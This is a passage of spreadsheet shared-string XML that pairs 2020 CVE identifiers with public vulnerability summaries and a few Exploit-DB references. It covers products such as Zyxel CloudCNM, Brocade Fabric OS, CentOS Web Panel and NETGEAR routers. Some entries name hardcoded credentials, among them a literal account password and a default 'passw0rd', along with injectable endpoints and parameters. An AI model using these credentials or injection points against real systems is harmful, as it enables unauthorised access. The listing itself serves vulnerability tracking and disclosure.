    <t>Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has a "Use of GET Request Method With Sensitive Query Strings" issue for /registerCpe requests.</t>
  </si>
  <si>
    <t>CVE-2020-15338</t>
  </si>
  <si>
    <t>Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has a "Use of GET Request Method With Sensitive Query Strings" issue for /cnr requests.</t>
  </si>
  <si>
    <t>CVE-2020-15339</t>
  </si>
  <si>
    <t>Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 allows live/CPEManager/AXCampaignManager/handle_campaign_script_link?script_name= XSS.</t>
  </si>
  <si>
    <t>CVE-2020-1534</t>
  </si>
  <si>
    <t>CVE-2020-15340</t>
  </si>
  <si>
    <t>Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has a hardcoded opt/axess/AXAssets/default_axess/axess/TR69/Handlers/turbolink/sshkeys/id_rsa SSH key.</t>
  </si>
  <si>
    <t>CVE-2020-15341</t>
  </si>
  <si>
    <t>Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has an unauthenticated update_all_realm_license API.</t>
  </si>
  <si>
    <t>CVE-2020-15342</t>
  </si>
  <si>
    <t>Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has an unauthenticated zy_install_user API.</t>
  </si>
  <si>
    <t>CVE-2020-15343</t>
  </si>
  <si>
    <t>Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has an unauthenticated zy_install_user_key API.</t>
  </si>
  <si>
    <t>CVE-2020-15344</t>
  </si>
  <si>
    <t>Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has an unauthenticated zy_get_user_id_and_key API.</t>
  </si>
  <si>
    <t>CVE-2020-15345</t>
  </si>
  <si>
    <t>Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has an unauthenticated zy_get_instances_for_update API.</t>
  </si>
  <si>
    <t>CVE-2020-15346</t>
  </si>
  <si>
    <t>Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has a /live/GLOBALS API with the CLOUDCNM key.</t>
  </si>
  <si>
    <t>CVE-2020-15347</t>
  </si>
  <si>
    <t>Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has the q6xV4aW8bQ4cfD-b password for the axiros account.</t>
  </si>
  <si>
    <t>CVE-2020-15348</t>
  </si>
  <si>
    <t>Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 allows use of live/CPEManager/AXCampaignManager/delete_cpes_by_ids?cpe_ids= for eval injection of Python code.</t>
  </si>
  <si>
    <t>CVE-2020-15349</t>
  </si>
  <si>
    <t>BinaryNights ForkLift 3.x before 3.4 has a local privilege escalation vulnerability because the privileged helper tool implements an XPC interface that allows file operations to any process (copy, move, delete) as root and changing permissions.</t>
  </si>
  <si>
    <t>CVE-2020-1535</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Backup Engine improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Backup Engine Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1536, CVE-2020-1539, CVE-2020-1540, CVE-2020-1541, CVE-2020-1542, CVE-2020-1543, CVE-2020-1544, CVE-2020-1545, CVE-2020-1546, CVE-2020-1547, CVE-2020-1551.</t>
  </si>
  <si>
    <t>CVE-2020-15350</t>
  </si>
  <si>
    <t>RIOT 2020.04 has a buffer overflow in the base64 decoder. The decoding function base64_decode() uses an output buffer estimation function to compute the required buffer capacity and validate against the provided buffer size. The base64_estimate_decode_size() function calculates the expected decoded size with an arithmetic round-off error and does not take into account possible padding bytes. Due to this underestimation, it may be possible to craft base64 input that causes a buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2020-15351</t>
  </si>
  <si>
    <t>IDrive before 6.7.3.19 on Windows installs by default to %PROGRAMFILES(X86)%\IDriveWindows with weak folder permissions granting any user modify permission (i.e., NT AUTHORITY\Authenticated Users:(OI)(CI)(M)) to the contents of the directory and its sub-folders. In addition, the program installs a service called IDriveService that runs as LocalSystem. Thus, any standard user can escalate privileges to NT AUTHORITY\SYSTEM by substituting the service's binary with a malicious one.</t>
  </si>
  <si>
    <t>CVE-2020-15352</t>
  </si>
  <si>
    <t>An XML external entity (XXE) vulnerability in Pulse Connect Secure (PCS) before 9.1R9 and Pulse Policy Secure (PPS) before 9.1R9 allows remote authenticated admins to conduct server-side request forgery (SSRF) attacks via a crafted DTD in an XML request.</t>
  </si>
  <si>
    <t>CVE-2020-15357</t>
  </si>
  <si>
    <t>Network Analysis functionality in Askey AP5100W_Dual_SIG_1.01.097 and all prior versions allows remote attackers to execute arbitrary commands via a shell metacharacter in the ping, traceroute, or route options.</t>
  </si>
  <si>
    <t>CVE-2020-15358</t>
  </si>
  <si>
    <t>In SQLite before 3.32.3, select.c mishandles query-flattener optimization, leading to a multiSelectOrderBy heap overflow because of misuse of transitive properties for constant propagation.</t>
  </si>
  <si>
    <t>CVE-2020-1536</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Backup Engine improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Backup Engine Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1535, CVE-2020-1539, CVE-2020-1540, CVE-2020-1541, CVE-2020-1542, CVE-2020-1543, CVE-2020-1544, CVE-2020-1545, CVE-2020-1546, CVE-2020-1547, CVE-2020-1551.</t>
  </si>
  <si>
    <t>exploits/php/webapps/48682.txt</t>
  </si>
  <si>
    <t>WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection</t>
  </si>
  <si>
    <t>CVE-2020-15360</t>
  </si>
  <si>
    <t>com.docker.vmnetd in Docker Desktop 2.3.0.3 allows privilege escalation because of a lack of client verification.</t>
  </si>
  <si>
    <t>CVE-2020-15362</t>
  </si>
  <si>
    <t>wifiscanner.js in thingsSDK WiFi Scanner 1.0.1 allows Code Injection because it can be used with options to overwrite the default executable/binary path and its arguments. An attacker can abuse this functionality to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-15363</t>
  </si>
  <si>
    <t>The Nexos theme through 1.7 for WordPress allows side-map/?search_order= SQL Injection.</t>
  </si>
  <si>
    <t>CVE-2020-15364</t>
  </si>
  <si>
    <t>The Nexos theme through 1.7 for WordPress allows top-map/?search_location= reflected XSS.</t>
  </si>
  <si>
    <t>CVE-2020-15365</t>
  </si>
  <si>
    <t>LibRaw before 0.20-Beta3 has an out-of-bounds write in parse_exif() in metadata\exif_gps.cpp via an unrecognized AtomName and a zero value of tiff_nifds.</t>
  </si>
  <si>
    <t>CVE-2020-15366</t>
  </si>
  <si>
    <t>An issue was discovered in ajv.validate() in Ajv (aka Another JSON Schema Validator) 6.12.2. A carefully crafted JSON schema could be provided that allows execution of other code by prototype pollution. (While untrusted schemas are recommended against, the worst case of an untrusted schema should be a denial of service, not execution of code.)</t>
  </si>
  <si>
    <t>CVE-2020-15367</t>
  </si>
  <si>
    <t>Venki Supravizio BPM 10.1.2 does not limit the number of authentication attempts. An unauthenticated user may exploit this vulnerability to launch a brute-force authentication attack against the Login page.</t>
  </si>
  <si>
    <t>CVE-2020-15368</t>
  </si>
  <si>
    <t>AsrDrv103.sys in the ASRock RGB Driver does not properly restrict access from user space, as demonstrated by triggering a triple fault via a request to zero CR3.</t>
  </si>
  <si>
    <t>CVE-2020-15369</t>
  </si>
  <si>
    <t>Supportlink CLI in Brocade Fabric OS Versions v8.2.1 through v8.2.1d, and 8.2.2 versions before v8.2.2c does not obfuscate the password field, which could expose users’ credentials of the remote server. An authenticated user could obtain the exposed password credentials to gain access to the remote host.</t>
  </si>
  <si>
    <t>CVE-2020-1537</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Remote Access improperly handles file operations, aka 'Windows Remote Access Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1530.</t>
  </si>
  <si>
    <t>CVE-2020-15370</t>
  </si>
  <si>
    <t>Brocade Fabric OS versions before Brocade Fabric OS v7.4.2g could allow an authenticated, remote attacker to view a user password in cleartext. The vulnerability is due to incorrectly logging the user password in log files.</t>
  </si>
  <si>
    <t>CVE-2020-15371</t>
  </si>
  <si>
    <t>Brocade Fabric OS versions before Brocade Fabric OS v9.0.0, v8.2.2c, v8.2.1e, v8.1.2k, v8.2.0_CBN3, contains code injection and privilege escalation vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-15372</t>
  </si>
  <si>
    <t>A vulnerability in the command-line interface in Brocade Fabric OS before Brocade Fabric OS v8.2.2a1, 8.2.2c, v7.4.2g, v8.2.0_CBN3, v8.2.1e, v8.1.2k, v9.0.0, could allow a local authenticated attacker to modify shell variables, which may lead to an escalation of privileges or bypassing the logging.</t>
  </si>
  <si>
    <t>CVE-2020-15373</t>
  </si>
  <si>
    <t>Multiple buffer overflow vulnerabilities in REST API in Brocade Fabric OS versions v8.2.1 through v8.2.1d, and 8.2.2 versions before v8.2.2c could allow remote unauthenticated attackers to perform various attacks.</t>
  </si>
  <si>
    <t>CVE-2020-15374</t>
  </si>
  <si>
    <t>Rest API in Brocade Fabric OS v8.2.1 through v8.2.1d, and 8.2.2 versions before v8.2.2c is vulnerable to multiple instances of reflected input.</t>
  </si>
  <si>
    <t>CVE-2020-15375</t>
  </si>
  <si>
    <t>Brocade Fabric OS versions before v9.0.0, v8.2.2c, v8.2.1e, v8.1.2k, v8.2.0_CBN3, v7.4.2g contain an improper input validation weakness in the command line interface when secccrypptocfg is invoked. The vulnerability could allow a local authenticated user to run arbitrary commands and perform escalation of privileges.</t>
  </si>
  <si>
    <t>CVE-2020-15376</t>
  </si>
  <si>
    <t>Brocade Fabric OS versions before v9.0.0 and after version v8.1.0, configured in Virtual Fabric mode contain a weakness in the ldap implementation that could allow a remote ldap user to login in the Brocade Fibre Channel SAN switch with "user" privileges if it is not associated with any groups.</t>
  </si>
  <si>
    <t>CVE-2020-15377</t>
  </si>
  <si>
    <t>Webtools in Brocade SANnav before version 2.1.1 allows unauthenticated users to make requests to arbitrary hosts due to a misconfiguration; this is commonly referred to as Server-Side Request Forgery (SSRF).</t>
  </si>
  <si>
    <t>CVE-2020-15378</t>
  </si>
  <si>
    <t>The OVA version of Brocade SANnav before version 2.1.1 installation with IPv6 networking exposes the docker container ports to the network, increasing the potential attack surface.</t>
  </si>
  <si>
    <t>CVE-2020-15379</t>
  </si>
  <si>
    <t>Brocade SANnav before v.2.1.0a could allow remote attackers cause a denial-of-service condition due to a lack of proper validation, of the length of user-supplied data as name for custom field name.</t>
  </si>
  <si>
    <t>CVE-2020-1538</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows UPnP Device Host improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows UPnP Device Host Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1519.</t>
  </si>
  <si>
    <t>CVE-2020-15380</t>
  </si>
  <si>
    <t>Brocade SANnav before version 2.1.1 logs account credentials at the ‘trace’ logging level.</t>
  </si>
  <si>
    <t>CVE-2020-15381</t>
  </si>
  <si>
    <t>Brocade SANnav before version 2.1.1 contains an Improper Authentication vulnerability that allows cleartext transmission of authentication credentials of the jmx server.</t>
  </si>
  <si>
    <t>CVE-2020-15382</t>
  </si>
  <si>
    <t>Brocade SANnav before version 2.1.1 uses a hard-coded administrator account with the weak password ‘passw0rd’ if a password is not provided for PostgreSQL at install-time.</t>
  </si>
  <si>
    <t>CVE-2020-15383</t>
  </si>
  <si>
    <t>Running security scans against the SAN switch can cause config and secnotify processes within the firmware before Brocade Fabric OS v9.0.0, v8.2.2d and v8.2.1e to consume all memory leading to denial of service impacts possibly including a switch panic.</t>
  </si>
  <si>
    <t>CVE-2020-15384</t>
  </si>
  <si>
    <t>Brocade SANNav before version 2.1.1 contains an information disclosure vulnerability. Successful exploitation of internal server information in the initial login response header.</t>
  </si>
  <si>
    <t>CVE-2020-15385</t>
  </si>
  <si>
    <t>Brocade SANnav before version 2.1.1 allows an authenticated attacker to list directories, and list files without permission. As a result, users without permission can see folders, and hidden files, and can create directories without permission.</t>
  </si>
  <si>
    <t>CVE-2020-15386</t>
  </si>
  <si>
    <t>Brocade Fabric OS prior to v9.0.1a and 8.2.3a and after v9.0.0 and 8.2.2d may observe high CPU load during security scanning, which could lead to a slower response to CLI commands and other operations.</t>
  </si>
  <si>
    <t>CVE-2020-15387</t>
  </si>
  <si>
    <t>The host SSH servers of Brocade Fabric OS before Brocade Fabric OS v7.4.2h, v8.2.1c, v8.2.2, v9.0.0, and Brocade SANnav before v2.1.1 utilize keys of less than 2048 bits, which may be vulnerable to man-in-the-middle attacks and/or insecure SSH communications.</t>
  </si>
  <si>
    <t>CVE-2020-15388</t>
  </si>
  <si>
    <t>A vulnerability in the Brocade Fabric OS before Brocade Fabric OS v9.0.1a, v8.2.3, v8.2.0_CBN4, and v7.4.2h could allow an authenticated CLI user to abuse the history command to write arbitrary content to files.</t>
  </si>
  <si>
    <t>CVE-2020-15389</t>
  </si>
  <si>
    <t>jp2/opj_decompress.c in OpenJPEG through 2.3.1 has a use-after-free that can be triggered if there is a mix of valid and invalid files in a directory operated on by the decompressor. Triggering a double-free may also be possible. This is related to calling opj_image_destroy twice.</t>
  </si>
  <si>
    <t>CVE-2020-1539</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Backup Engine improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Backup Engine Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1535, CVE-2020-1536, CVE-2020-1540, CVE-2020-1541, CVE-2020-1542, CVE-2020-1543, CVE-2020-1544, CVE-2020-1545, CVE-2020-1546, CVE-2020-1547, CVE-2020-1551.</t>
  </si>
  <si>
    <t>CVE-2020-15390</t>
  </si>
  <si>
    <t>pyActivity in Pega Platform 8.4.0.237 has a security misconfiguration that leads to an improper access control vulnerability via =GetWebInfo.</t>
  </si>
  <si>
    <t>CVE-2020-15391</t>
  </si>
  <si>
    <t>The UI in DevSpace 4.13.0 allows web sites to execute actions on pods (on behalf of a victim) because of a lack of authentication for the WebSocket protocol. This leads to remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-15392</t>
  </si>
  <si>
    <t>A user enumeration vulnerability flaw was found in Venki Supravizio BPM 10.1.2. This issue occurs during password recovery, where a difference in error messages could allow an attacker to determine if a username is valid or not, enabling a brute-force attack with valid usernames.</t>
  </si>
  <si>
    <t>CVE-2020-15393</t>
  </si>
  <si>
    <t>In the Linux kernel 4.4 through 5.7.6, usbtest_disconnect in drivers/usb/misc/usbtest.c has a memory leak, aka CID-28ebeb8db770.</t>
  </si>
  <si>
    <t>CVE-2020-15394</t>
  </si>
  <si>
    <t>The REST API in Zoho ManageEngine Applications Manager before build 14740 allows an unauthenticated SQL Injection via a crafted request, leading to Remote Code Execution.</t>
  </si>
  <si>
    <t>CVE-2020-15395</t>
  </si>
  <si>
    <t>In MediaInfoLib in MediaArea MediaInfo 20.03, there is a stack-based buffer over-read in Streams_Fill_PerStream in Multiple/File_MpegPs.cpp (aka an off-by-one during MpegPs parsing).</t>
  </si>
  <si>
    <t>CVE-2020-15396</t>
  </si>
  <si>
    <t>In HylaFAX+ through 7.0.2 and HylaFAX Enterprise, the faxsetup utility calls chown on files in user-owned directories. By winning a race, a local attacker could use this to escalate his privileges to root.</t>
  </si>
  <si>
    <t>CVE-2020-15397</t>
  </si>
  <si>
    <t>HylaFAX+ through 7.0.2 and HylaFAX Enterprise have scripts that execute binaries from directories writable by unprivileged users (e.g., locations under /var/spool/hylafax that are writable by the uucp account). This allows these users to execute code in the context of the user calling these binaries (often root).</t>
  </si>
  <si>
    <t>CVE-2020-1540</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Backup Engine improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Backup Engine Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1535, CVE-2020-1536, CVE-2020-1539, CVE-2020-1541, CVE-2020-1542, CVE-2020-1543, CVE-2020-1544, CVE-2020-1545, CVE-2020-1546, CVE-2020-1547, CVE-2020-1551.</t>
  </si>
  <si>
    <t>CVE-2020-15400</t>
  </si>
  <si>
    <t>CakePHP before 4.0.6 mishandles CSRF token generation. This might be remotely exploitable in conjunction with XSS.</t>
  </si>
  <si>
    <t>CVE-2020-15401</t>
  </si>
  <si>
    <t>IOBit Malware Fighter Pro 8.0.2.547 allows local users to gain privileges for file deletion by manipulating malicious flagged file locations with an NTFS junction and an Object Manager symbolic link.</t>
  </si>
  <si>
    <t>CVE-2020-15408</t>
  </si>
  <si>
    <t>An issue was discovered in Pulse Secure Pulse Connect Secure before 9.1R8. An authenticated attacker can access the admin page console via the end-user web interface because of a rewrite.</t>
  </si>
  <si>
    <t>CVE-2020-1541</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Backup Engine improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Backup Engine Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1535, CVE-2020-1536, CVE-2020-1539, CVE-2020-1540, CVE-2020-1542, CVE-2020-1543, CVE-2020-1544, CVE-2020-1545, CVE-2020-1546, CVE-2020-1547, CVE-2020-1551.</t>
  </si>
  <si>
    <t>CVE-2020-15411</t>
  </si>
  <si>
    <t>An issue was discovered in MISP 2.4.128. app/Controller/AttributesController.php has insufficient ACL checks in the attachment downloader.</t>
  </si>
  <si>
    <t>CVE-2020-15412</t>
  </si>
  <si>
    <t>An issue was discovered in MISP 2.4.128. app/Controller/EventsController.php lacks an event ACL check before proceeding to allow a user to send an event contact form.</t>
  </si>
  <si>
    <t>CVE-2020-15415</t>
  </si>
  <si>
    <t>On DrayTek Vigor3900, Vigor2960, and Vigor300B devices before 1.5.1, cgi-bin/mainfunction.cgi/cvmcfgupload allows remote command execution via shell metacharacters in a filename when the text/x-python-script content type is used, a different issue than CVE-2020-14472.</t>
  </si>
  <si>
    <t>CVE-2020-15416</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6700 V1.0.4.84_10.0.58 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the httpd service, which listens on TCP port 80 by default. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length, stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9703.</t>
  </si>
  <si>
    <t>CVE-2020-15417</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR R6700 V1.0.4.84_10.0.58 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of string table file uploads. A crafted gui_region in a string table file can trigger an overflow of a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the web server. Was ZDI-CAN-9756.</t>
  </si>
  <si>
    <t>CVE-2020-15418</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Veeam ONE 10.0.0.750_20200415. Authentication is not required to exploit this vulnerability. The specific flaw exists within the SSRSReport class. Due to the improper restriction of XML External Entity (XXE) references, a specially crafted document specifying a URI causes the XML parser to access the URI and embed the contents back into the XML document for further processing. An attacker can leverage this vulnerability to disclose file contents in the context of SYSTEM. Was ZDI-CAN-10709.</t>
  </si>
  <si>
    <t>CVE-2020-15419</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Veeam ONE 10.0.0.750_20200415. Authentication is not required to exploit this vulnerability. The specific flaw exists within the Reporter_ImportLicense class. Due to the improper restriction of XML External Entity (XXE) references, a specially crafted document specifying a URI causes the XML parser to access the URI and embed the contents back into the XML document for further processing. An attacker can leverage this vulnerability to disclose file contents in the context of SYSTEM. Was ZDI-CAN-10710.</t>
  </si>
  <si>
    <t>CVE-2020-1542</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Backup Engine improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Backup Engine Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1535, CVE-2020-1536, CVE-2020-1539, CVE-2020-1540, CVE-2020-1541, CVE-2020-1543, CVE-2020-1544, CVE-2020-1545, CVE-2020-1546, CVE-2020-1547, CVE-2020-1551.</t>
  </si>
  <si>
    <t>CVE-2020-15420</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-el7-0.9.8.891. Authentication is not required to exploit this vulnerability. The specific flaw exists within loader_ajax.php. When parsing the line parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9259.</t>
  </si>
  <si>
    <t>CVE-2020-15421</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_mod_security.php. When parsing the check_ip parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9707.</t>
  </si>
  <si>
    <t>CVE-2020-15422</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_mod_security.php. When parsing the archivo parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9731.</t>
  </si>
  <si>
    <t>CVE-2020-15423</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_mod_security.php. When parsing the dominio parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9732.</t>
  </si>
  <si>
    <t>CVE-2020-15424</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_mod_security.php. When parsing the domain parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9735.</t>
  </si>
  <si>
    <t>CVE-2020-15425</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_mod_security.php. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9742.</t>
  </si>
  <si>
    <t>CVE-2020-15426</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_migration_cpanel.php. When parsing the serverip parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9709.</t>
  </si>
  <si>
    <t>CVE-2020-15427</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_disk_usage.php. When parsing the folderName parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9713.</t>
  </si>
  <si>
    <t>CVE-2020-15428</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_crons.php. When parsing the line parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9714.</t>
  </si>
  <si>
    <t>CVE-2020-15429</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_crons.php. When parsing the user parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9716.</t>
  </si>
  <si>
    <t>CVE-2020-1543</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Backup Engine improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Backup Engine Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1535, CVE-2020-1536, CVE-2020-1539, CVE-2020-1540, CVE-2020-1541, CVE-2020-1542, CVE-2020-1544, CVE-2020-1545, CVE-2020-1546, CVE-2020-1547, CVE-2020-1551.</t>
  </si>
  <si>
    <t>CVE-2020-15430</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_list_accounts.php. When parsing the username parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9736.</t>
  </si>
  <si>
    <t>CVE-2020-15431</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_crons.php. When parsing the user parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9740.</t>
  </si>
  <si>
    <t>CVE-2020-15432</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_migration_cpanel.php. When parsing the filespace parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9743.</t>
  </si>
  <si>
    <t>CVE-2020-15433</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_php_pecl.php. When parsing the phpversion parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9715.</t>
  </si>
  <si>
    <t>CVE-2020-15434</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_php_pecl.php. When parsing the canal parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9745.</t>
  </si>
  <si>
    <t>CVE-2020-15435</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_dashboard.php. When parsing the service_start parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9719.</t>
  </si>
  <si>
    <t>CVE-2020-15436</t>
  </si>
  <si>
    <t>Use-after-free vulnerability in fs/block_dev.c in the Linux kernel before 5.8 allows local users to gain privileges or cause a denial of service by leveraging improper access to a certain error field.</t>
  </si>
  <si>
    <t>CVE-2020-15437</t>
  </si>
  <si>
    <t>The Linux kernel before version 5.8 is vulnerable to a NULL pointer dereference in drivers/tty/serial/8250/8250_core.c:serial8250_isa_init_ports() that allows local users to cause a denial of service by using the p-&gt;serial_in pointer which uninitialized.</t>
  </si>
  <si>
    <t>CVE-2020-1544</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Backup Engine improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Backup Engine Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1535, CVE-2020-1536, CVE-2020-1539, CVE-2020-1540, CVE-2020-1541, CVE-2020-1542, CVE-2020-1543, CVE-2020-1545, CVE-2020-1546, CVE-2020-1547, CVE-2020-1551.</t>
  </si>
  <si>
    <t>CVE-2020-1545</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Backup Engine improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Backup Engine Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1535, CVE-2020-1536, CVE-2020-1539, CVE-2020-1540, CVE-2020-1541, CVE-2020-1542, CVE-2020-1543, CVE-2020-1544, CVE-2020-1546, CVE-2020-1547, CVE-2020-1551.</t>
  </si>
  <si>
    <t>CVE-2020-1546</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Backup Engine improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Backup Engine Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1535, CVE-2020-1536, CVE-2020-1539, CVE-2020-1540, CVE-2020-1541, CVE-2020-1542, CVE-2020-1543, CVE-2020-1544, CVE-2020-1545, CVE-2020-1547, CVE-2020-1551.</t>
  </si>
  <si>
    <t>exploits/php/webapps/48190.txt</t>
  </si>
  <si>
